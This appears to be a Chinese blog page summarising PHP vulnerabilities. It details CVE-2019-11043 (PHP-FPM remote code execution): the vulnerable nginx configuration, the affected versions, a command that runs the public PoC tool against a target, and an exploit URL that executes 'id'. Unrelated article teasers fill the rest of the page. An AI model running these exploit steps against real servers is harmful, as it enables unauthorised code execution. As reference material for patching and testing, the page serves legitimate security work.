CVE-2016-7411
CVE-2016-7412
CVE-2016-7413
CVE-2016-7414
CVE-2016-7415
CVE-2016-7416
CVE-2016-7417
CVE-2016-7418


CVE-2019-11043




Date:

2019.9.

类型:

远程代码执行

前置条件:


Nginx + fastcgi + php-fpm 


配置文件信息如下:

location ~ [^/]\.php(/|$) {

  ...

  fastcgi_split_path_info ^(.+?\.php)(/.*)$;

  fastcgi_param PATH_INFO       $fastcgi_path_info;

  fastcgi_pass   php:;

  ...

}

影响范围:
version>php 7, php5(EXP暂无)
PHP 7.1版本小于7.1.33;PHP 7.2版本小于7.2.24;PHP 7.3版本小于7.3.11

PoC:
https://github.com/neex/phuip-fpizdam
go run . "http://ip:8080/index.php"


ExP:
http://ip:8080/index.php?a=id


												


											
应用安全 - 编程语言漏洞 - PHP语言漏洞汇总的更多相关文章
	

    
								
  1. PhpStudy2018后门漏洞预警及漏洞复现&检测和执行POC脚本
		
    PhpStudy2018后门漏洞预警及漏洞复现&检测和执行POC脚本 phpstudy介绍 Phpstudy是国内的一款免费的PHP调试环境的程序集成包,其通过集成Apache.PHP.MyS ...
    
		
    2. 
						
  2. DedeCMS flink_add Getshell漏洞 管理员CSRF漏洞
		
    DedeCMS flink_add Getshell漏洞 管理员CSRF漏洞 1.漏洞利用 由于tpl.php中的$action,$content,$filename变量没有初始化,从而能操纵这些变量 ...
    
		
    3. 
						
  3. Go语言语法汇总(转)
		
    Go语言语法汇总 分类: 技术2013-09-16 14:21 3007人阅读 评论(0) 收藏 举报 go语言golang并发语法   目录(?)[+]   最近看了看GoLang,把Go语言的语法 ...
    
		
    4. 
						
  4. Nikto是一款Web安全扫描工具,可以扫描指定主机的web类型,主机名,特定目录,cookie,特定CGI漏洞,XSS漏洞,SQL注入漏洞等,非常强大滴说。。。
		
    Nikto是一款Web安全扫描工具,可以扫描指定主机的web类型,主机名,特定目录,cookie,特定CGI漏洞,XSS漏洞,SQL注入漏洞等,非常强大滴说... root@xi4ojin:~# cd ...
    
		
    5. 
						
  5. 利用窗口引用漏洞和XSS漏洞实现浏览器劫持
		
    ==Ph4nt0m Security Team==                        Issue 0x03, Phile #0x05 of 0x07 |=----------------- ...
    
		
    6. 
						
  6. OpenSSL重大漏洞-Heartbleed之漏洞利用脚本POC讲解
		
    OpenSSL Security Advisory [07 Apr 2014] ======================================== TLS heartbeat read  ...
    
		
    7. 
						
  7. MySQL 0Day漏洞出现 该漏洞可以拿到本地Root权限
		
    2016年9月12日, legalhackers.com网站发布了编号为CVE-2016-6662的0day漏洞公告 .由于该漏洞可以获得MySQL服务器的Root权限,且影响MySql5.5.5.6 ...
    
		
    8. 
						
  8. ref:PHP反序列化漏洞成因及漏洞挖掘技巧与案例
		
    ref:https://www.anquanke.com/post/id/84922 PHP反序列化漏洞成因及漏洞挖掘技巧与案例 一.序列化和反序列化 序列化和反序列化的目的是使得程序间传输对象会更加 ...
    
		
    9. 
						
  9. atitit.面向过程的编程语言异常处理 c语言 asp vbs 的try catch 实现
		
    atitit.面向过程的编程语言异常处理 c语言 asp vbs 的try catch 实现 1. 返回值法.and全局ERROR 变量法 1 2. 抛出异常Err.Raise 1 3. 实现try  ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. 实体类相同属性间赋值与如何判断实体类中是否所有的字段都为null
			
    1,实体类相同属性间赋值 /// <summary> /// 将实体2的值动态赋值给实体1(名称一样的属性进行赋值) /// </summary> /// <param  ...
    
			
    2. 
						
  2. 远程连接工具rdcman
			
    介绍一个远程连接的工具RDCMan.RDCMan全称Remote Desktop Connection Manager(多远程桌面管理)是微软Windows Live体验团队的主要开发者 Julian ...
    
			
    3. 
						
  3. 十二、S3C2440 裸机 — SDRAM
			
    12.1 SDRAM 介绍 12.1.1 SDRAM 定义 SDRAM(Synchronous Dynamic Random Access Memory):同步动态随机存储器-内存条 同步是指内存工作 ...
    
			
    4. 
						
  4. Spring MVC文件上传下载(转载)
			
    原文地址: http://www.cnblogs.com/WJ-163/p/6269409.html 上传参考 http://www.cnblogs.com/lonecloud/p/5990060.h ...
    
			
    5. 
						
  5. jQuery $.ajax传递数组的traditional参数传递必须true 对象的序列化
			
    数组类型参数传递: 若一个请求中包含多个值,如:(test.action?tid=1&tid=2&tid=3),参数都是同一个,只是指定多个值,这样请求时后台会发生解析错误,应先使用  ...
    
			
    6. 
						
  6. 从输入一个URL到页面渲染的流程简介
			
    首先说明以下是我参考网上答案和自己的思考,给出自己的想法,如果有问题,欢迎大家吐槽从用户在浏览器中输入一个URL,到整个页面渲染,这个过程中究竟发生了什么呢?今天先简单写下整个过程,后面再一点点完善. ...
    
			
    7. 
						
  7. LOJ-6277-数列分块入门1(分块)
			
    链接: https://loj.ac/problem/6277 题意: 给出一个长为 的数列,以及 个操作,操作涉及区间加法,单点查值. 思路: 线段树可以解决,用来学习分块. 分块概念就是,将序列分 ...
    
			
    8. 
						
  8. Codeforces Round #568 (Div. 2) C2. Exam in BerSU (hard version)
			
    链接: https://codeforces.com/contest/1185/problem/C2 题意: The only difference between easy and hard ver ...
    
			
    9. 
						
  9. css @keyframes属性 语法
			
    css @keyframes属性 语法 @keyframes是什么?直线电机生产厂家 @keyframes是CSS的一种规则,可以用来定义CSS动画的一个周期的行为,创建简单的动画. 作用:通过 @k ...
    
			
    10. 
						
  10. vue 渲染是出现 Do not use built-in or reserved HTML elements as component id 的警告
			
    情况1.是因为组件命名和引入不一致造成的. 命名组件(nav) export default { name: 'nav', data () { return { } } 引入组件(Navigation ...
    
			
    11.